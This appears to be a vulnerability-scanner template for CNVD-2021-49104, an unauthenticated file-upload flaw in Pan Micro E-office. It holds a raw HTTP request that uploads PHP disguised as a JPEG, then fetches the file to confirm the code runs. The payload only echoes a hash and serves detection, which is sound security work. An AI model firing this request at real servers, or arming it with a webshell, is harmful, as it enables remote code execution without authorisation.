id: CNVD-2021-49104

info:
  name: Pan Micro E-office File Uploads
  author: pikpikcu
  severity: critical
  reference: https://chowdera.com/2021/12/202112200602130067.html
  tags: pan,micro,cnvd,cnvd2021

requests:
  - raw:
      - |
        POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

        --e64bdf16c554bbc109cecef6451c26a4
        Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
        Content-Type: image/jpeg

        <?php echo md5('CNVD-2021-49104');?>

        --e64bdf16c554bbc109cecef6451c26a4--

      - |
        GET /images/logo/logo-eoffice.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "94d01a2324ce38a2e29a629c54190f67"

      - type: status
        status:
          - 200
